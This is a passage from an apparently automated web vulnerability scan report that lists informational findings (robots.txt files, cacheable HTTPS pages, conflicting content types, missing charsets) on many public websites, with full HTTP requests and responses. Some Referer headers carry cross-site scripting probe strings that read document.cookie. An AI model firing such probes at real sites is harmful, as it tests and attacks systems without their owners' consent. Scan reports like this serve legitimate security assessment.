PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:03:48 GMT
Connection: close

User-agent: *
Disallow: /goto.aspx

Sitemap: http://www.ticketcity.com/tcsitemap_index.xml

29.126. http://www.tigerdirect.com/applications/SearchTools/item-details.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.com
Path:   /applications/SearchTools/item-details.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tigerdirect.com

Response

HTTP/1.0 200 OK
Content-Length: 112
Content-Type: text/plain
Last-Modified: Fri, 24 Jul 2009 20:02:38 GMT
Accept-Ranges: bytes
ETag: "a3c6d8b199cca1:7313"
Server: Microsoft-IIS/6.0
X-SV: MIA05B
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:24:09 GMT
Connection: close

# Allow all

User-agent: *
Disallow: /cgi-bin/
Disallow: /cgisec/
Disallow: /profiles/
Disallow: /email/

29.127. http://www.twitter.com/MAlexJohnson

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twitter.com
Path:   /MAlexJohnson

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:39 GMT
Server: Apache
Vary: Host,Accept-Encoding
Set-Cookie: k=173.193.214.243.1296357579603072; path=/; expires=Sun, 06-Feb-11 03:19:39 GMT; domain=.twitter.com
Last-Modified: Sat, 29 Jan 2011 02:17:05 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Mon, 31 Jan 2011 03:19:39 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

29.128. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walmart.com
Path:   /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.walmart.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15
Last-Modified: Fri, 28 Jan 2011 10:32:28 GMT
ETag: "2b052-d0-49ae59533ae97"
Content-Type: text/plain; charset=ISO-8859-1
Date: Sun, 30 Jan 2011 02:03:54 GMT
Content-Length: 208
Connection: close
Set-Cookie: dcenv=edc; path=/; domain=walmart.com

#go away
User-agent: *
Sitemap: http://www.walmart.com/Sitemap_Index.xml
Sitemap: http://www.walmart.com/EndecaBrowse_Sitemap_Index.xml
# Disallow the following URLs
Disallow: /solutions
Disallow: /cs
...[SNIP]...

29.129. http://www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weblogs.com
Path:   /$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.weblogs.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:04 GMT
Server: Apache
Last-Modified: Tue, 18 Jan 2011 00:39:03 GMT
ETag: "16c920-2e-49a14208d57c0"
Accept-Ranges: bytes
Content-Length: 46
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google*
Disallow:

29.130. http://www.webmd.com/$|wonderwall.redacted|redacted/wonderwall|v14.redacted/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webmd.com
Path:   /$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.webmd.com

Response

HTTP/1.1 200 OK
Content-Length: 134
Content-Type: text/plain
Content-Location: http://www.webmd.com/robots.txt
Last-Modified: Tue, 19 Aug 2008 19:19:28 GMT
Accept-Ranges: bytes
ETag: "060a57f302c91:13b0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:04:07 GMT
Connection: keep-alive

# Robots.txt file WebMD
# Updated: Jan 2007

User-agent: *
Disallow: /404
Disallow: /500
Disallow: /search/search_results/

30. Cacheable HTTPS response
There are 13 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


30.1. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:25 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:25 GMT
Content-Length: 9085


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...

30.2. https://login.silverlight.net/login/forgotpassword.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/forgotpassword.aspx

Request

GET /login/forgotpassword.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bjavascript%25253AWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524ma%2526oidt%253D2%2526ot%253DSUBMIT; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12239
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Forgot
...[SNIP]...

30.3. https://secure.opinionlab.com/ccc01/comment_card.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:21:59 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

30.4. https://secure.opinionlab.com/ccc01/o.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.opinionlab.com
Path:   /ccc01/o.asp

Request

GET /ccc01/o.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABQACCS=LHLFKHPBAJOOIDHFICBAPGEC; path=/
Date: Sat, 29 Jan 2011 23:50:47 GMT
Connection: close


30.5. https://www.google.com/adsense/support/bin/request.py

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /adsense/support/bin/request.py

Request

GET /adsense/support/bin/request.py HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D303678ee3ceffa89%26v%3D2%26c%3De08e7d44%26s%3D4d44bd51%26t%3DR%3A0%3A%26sessref%3D; Expires=Sun, 30-Jan-2011 01:52:25 GMT; Path=/adsense/support; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 01:22:25 GMT
Expires: Sun, 30 Jan 2011 01:22:25 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...

30.6. https://www.newsvine.com/_action/user/logout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_action/user/logout

Request

GET /_action/user/logout HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=6f1155b9ad575142bcd172d5d0a7cfe4; expires=Sat, 25-Jan-2031 03:14:57 GMT; path=/; domain=.newsvine.com
Content-Length: 0
Content-Type: text/html
Connection: close


30.7. https://www.newsvine.com/_nv/accounts/global/information

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/global/information

Request

GET /_nv/accounts/global/information?affiliate= HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 19:14:00 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=ec5f7b8cd5b4befb3ef83274f58cafb4; expires=Sat, 25-Jan-2031 19:14:00 GMT; path=/; domain=.newsvine.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


30.8. https://www.newsvine.com/_nv/accounts/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/login

Request

GET /_nv/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 19:13:56 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=7b22b47475b54bab17a970fa3de24600; expires=Sat, 25-Jan-2031 19:13:56 GMT; path=/; domain=.newsvine.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


30.9. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/msnbc/emailAlerts

Request

GET /_nv/accounts/msnbc/emailAlerts HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:53 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=0e0c419af9db7beaa9782211b1d63042; expires=Sat, 25-Jan-2031 03:14:53 GMT; path=/; domain=.newsvine.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


30.10. https://www.newsvine.com/_nv/accounts/msnbc/newsletters

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/msnbc/newsletters

Request

GET /_nv/accounts/msnbc/newsletters?affiliate=todayshow.com&categoryFilter=today HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:50 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=02396598600ac73fb37c1186c374650e; expires=Sat, 25-Jan-2031 03:14:50 GMT; path=/; domain=.newsvine.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


30.11. https://www.newsvine.com/_nv/accounts/register

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/accounts/register

Request

GET /_nv/accounts/register?referrer=toolbar HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 19:04:17 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3b662defffbb251275e854399fecf5e4; expires=Sat, 25-Jan-2031 19:04:17 GMT; path=/; domain=.newsvine.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close


30.12. https://www.newsvine.com/_nv/api/accounts/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/api/accounts/login

Request

GET /_nv/api/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:51 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=aa6836e6849505e061ea2e467e70f836; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:51 GMT
Vary: Accept-Encoding
Content-Length: 97
Content-Type: application/json
Connection: close

{"data":{"errors":{"L2":"Please enter your email address and password."}},"statusCode":"failure"}

30.13. https://www.newsvine.com/_nv/api/accounts/resetPassword

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.newsvine.com
Path:   /_nv/api/accounts/resetPassword

Request

GET /_nv/api/accounts/resetPassword HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:02 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=b87462d701086cc5258ca445f8422d6b; expires=Sat, 25-Jan-2031 03:14:02 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 03:15:02 GMT
Vary: Accept-Encoding
Content-Length: 100
Content-Type: application/json
Connection: close

{"data":{"errors":{"RP1":"Please enter your email address or domain name."}},"statusCode":"failure"}

31. Multiple content types specified

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloglines.com
Path:   /js/r200702160/bl/home.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Issue background

If a web response specifies multiple incompatible content types, then the browser will usually analyse the response and attempt to determine the actual MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of multiple incompatible content type statements does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /js/r200702160/bl/home.js HTTP/1.1
Host: www.bloglines.com
Proxy-Connection: keep-alive
Referer: http://www.bloglines.com/sub/?fc6fa%3Cscript%3Ealert(document.cookie)%3C/script%3E715c72a1043=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Accept-Ranges: bytes
ETag: "1465341435"
Last-Modified: Wed, 01 Dec 2010 01:13:52 GMT
Content-Length: 5128
Date: Sun, 30 Jan 2011 01:53:12 GMT
Server: lighttpd/1.4.26

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Bl
...[SNIP]...

32. HTML does not specify charset
There are 89 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


32.1. http://ad.doubleclick.net/adi/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/

Request

GET /adi/ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html
X-Dclk-Inred-Response-Type: None
Content-Length: 26
Date: Sun, 30 Jan 2011 02:04:39 GMT
Server: GFE/2.0
Connection: close

<html><body></body></html>

32.2. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Request

GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=36872389&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:19:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5224

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,335 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...

32.3. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.3

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=1664632858&PG=INV4QC&ASID=85e75f745ae649c9986d96549fa0e2b8&destination=;ord=1664632858? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 13:00:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 554

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/4/0/%2a/r;
...[SNIP]...

32.4. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.5

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:56:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

32.5. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.MSN/B5123509.8

Request

GET /adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:27:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5877

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...

32.6. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.7

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
